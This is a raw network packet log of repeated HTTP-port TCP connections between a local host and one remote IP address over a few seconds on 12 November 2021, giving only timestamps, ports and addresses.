                          Nov 12, 2021 22:24:02.454478979 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454515934 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454529047 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454540968 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454554081 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454570055 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454592943 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454596043 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454631090 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454647064 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454662085 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454678059 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454694986 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454709053 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454724073 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454740047 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454755068 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454771042 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454786062 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.454799891 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.476739883 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.477370977 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.480170965 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.480292082 CET5001780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.505927086 CET5001780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.506352901 CET5001580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.507842064 CET5001880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.528285980 CET8050017178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.528765917 CET5001780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.528779030 CET8050015178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.528901100 CET5001580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.530126095 CET8050018178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.530316114 CET5001880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.531311989 CET5001880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.553493977 CET8050018178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.556371927 CET8050018178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.559847116 CET5001880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.679325104 CET5001880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.680898905 CET5002080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.701610088 CET8050018178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.701730013 CET5001880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.703124046 CET8050020178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.703407049 CET5002080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.714185953 CET5002080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.736486912 CET8050020178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.739989042 CET8050020178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.741544008 CET5002080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.846282005 CET5002080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.848588943 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.868714094 CET8050020178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.868794918 CET5002080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.872176886 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.872299910 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.873610020 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.895840883 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.901458979 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.903986931 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.927686930 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.927989006 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.928000927 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.928716898 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.952388048 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.952410936 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.952419996 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.952428102 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.952507019 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.952537060 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.952538013 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.952626944 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.974793911 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974807978 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974821091 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974869967 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974883080 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974900961 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.974941969 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.974946022 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974955082 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.974962950 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.974984884 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.974993944 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.975009918 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.975053072 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.975119114 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.975173950 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.997252941 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997271061 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997354984 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997394085 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997411966 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.997459888 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.997483015 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997503996 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:02.997514963 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997564077 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997575045 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997584105 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997591972 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997601032 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997641087 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997775078 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997931004 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997945070 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997952938 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997962952 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:02.997978926 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.019793987 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.019809961 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.019825935 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.019885063 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.019964933 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.019973993 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.020081997 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.035140991 CET5002380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.041726112 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.042076111 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.057480097 CET8050023178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.057873011 CET5002380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.058553934 CET5002380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.080905914 CET8050023178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.085665941 CET8050023178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.086021900 CET5002380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.213412046 CET5002380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.213758945 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.214915991 CET5002580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.235699892 CET8050023178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.235795975 CET5002380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.236743927 CET8050022178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.237046003 CET8050025178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.239172935 CET5002280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.239892006 CET5002580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.240451097 CET5002580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.264261007 CET8050025178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.268760920 CET8050025178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.268976927 CET5002580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.394583941 CET5002580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.396459103 CET5002680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.417001963 CET8050025178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.417959929 CET5002580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.418745041 CET8050026178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.423996925 CET5002680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.425555944 CET5002680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.447782040 CET8050026178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.451467991 CET8050026178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.451740026 CET5002680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.566405058 CET5002680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.566778898 CET5002880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.588921070 CET8050026178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.588969946 CET8050028178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.589876890 CET5002680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.589953899 CET5002880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.590533018 CET5002880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.612739086 CET8050028178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.618005037 CET8050028178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.622064114 CET5002880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.736938953 CET5002880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.738862991 CET5003080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.760516882 CET8050028178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.762113094 CET5002880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.764137983 CET8050030178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.764293909 CET5003080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.764974117 CET5003080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.788525105 CET8050030178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.792697906 CET8050030178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.794589043 CET5003080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.911932945 CET5003080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.913268089 CET5003280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.935643911 CET8050032178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.935759068 CET5003280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.936434984 CET5003280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.959661007 CET8050032178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.962680101 CET8050032178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:03.962798119 CET5003280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:03.974054098 CET8050030178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.012155056 CET8050030178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.013773918 CET5003080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.065499067 CET5003280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.067522049 CET5003380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.088542938 CET8050032178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.088665009 CET5003280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.091633081 CET8050033178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.096029997 CET5003380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.096788883 CET5003380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.119716883 CET8050033178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.123820066 CET8050033178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.125052929 CET5003380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.225477934 CET5003380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.226630926 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.239118099 CET5003680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.247833014 CET8050033178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.247920036 CET5003380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.248877048 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.248997927 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.249775887 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.249984980 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.250269890 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.250427008 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.261729956 CET8050036178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.261920929 CET5003680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.262406111 CET5003680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272073984 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272144079 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272479057 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272533894 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272547007 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272558928 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272608995 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272622108 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272634983 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272644043 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272656918 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272665977 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272665977 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272677898 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.272696018 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272702932 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272710085 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272716045 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272723913 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.272737980 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.284625053 CET8050036178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.288937092 CET8050036178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.289105892 CET5003680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.295036077 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295066118 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295077085 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295089960 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295103073 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295123100 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295135021 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295142889 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295150042 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295156956 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295165062 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295176983 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295183897 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295197010 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295212030 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295221090 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295254946 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.295258045 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295272112 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295295000 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.295348883 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.295366049 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.295605898 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.295762062 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.295862913 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.317723989 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317737103 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317749023 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317776918 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317785978 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317797899 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317809105 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317821980 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317832947 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317841053 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317852020 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317861080 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317871094 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317912102 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317969084 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317984104 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.317996025 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318041086 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318056107 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318058968 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.318065882 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318074942 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318108082 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.318151951 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318160057 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318218946 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318231106 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318239927 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318252087 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318260908 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318269968 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318281889 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318293095 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318305016 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318317890 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318327904 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318336010 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318346977 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318353891 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.318368912 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340711117 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340745926 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340787888 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340833902 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340884924 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340958118 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.340991020 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.343017101 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.343097925 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.393258095 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.393529892 CET5003680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.395131111 CET5003880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.415743113 CET8050035178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.415776014 CET8050036178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.415942907 CET5003580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.416024923 CET5003680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.417404890 CET8050038178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.417574883 CET5003880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.418118000 CET5003880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.440548897 CET8050038178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.445785999 CET8050038178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.445950031 CET5003880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.549514055 CET5003880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.550632000 CET5003980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.572104931 CET8050038178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.572197914 CET5003880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.572886944 CET8050039178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.572988987 CET5003980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.573520899 CET5003980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.596837044 CET8050039178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.601016998 CET8050039178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.601152897 CET5003980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.708648920 CET5003980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.728702068 CET5004180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.731267929 CET8050039178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.731385946 CET5003980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.751704931 CET8050041178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.751877069 CET5004180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.754512072 CET5004180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.777764082 CET8050041178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.781559944 CET8050041178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.781620979 CET5004180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.895884991 CET5004180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.897418022 CET5004380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.918792009 CET8050041178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.918939114 CET5004180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.919790030 CET8050043178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:04.919995070 CET5004380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:04.992624044 CET5004380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.016067028 CET8050043178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.024060965 CET8050043178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.024220943 CET5004380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.288393974 CET5004380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.289541960 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.311094999 CET8050043178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.311206102 CET5004380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.312052965 CET8050044178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.312181950 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.313631058 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.336102962 CET8050044178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.336143017 CET8050044178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.336158037 CET8050044178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.336205959 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.336229086 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.440670967 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.442008018 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.463119030 CET8050044178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.463237047 CET5004480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.464503050 CET8050045178.208.83.45192.168.2.4
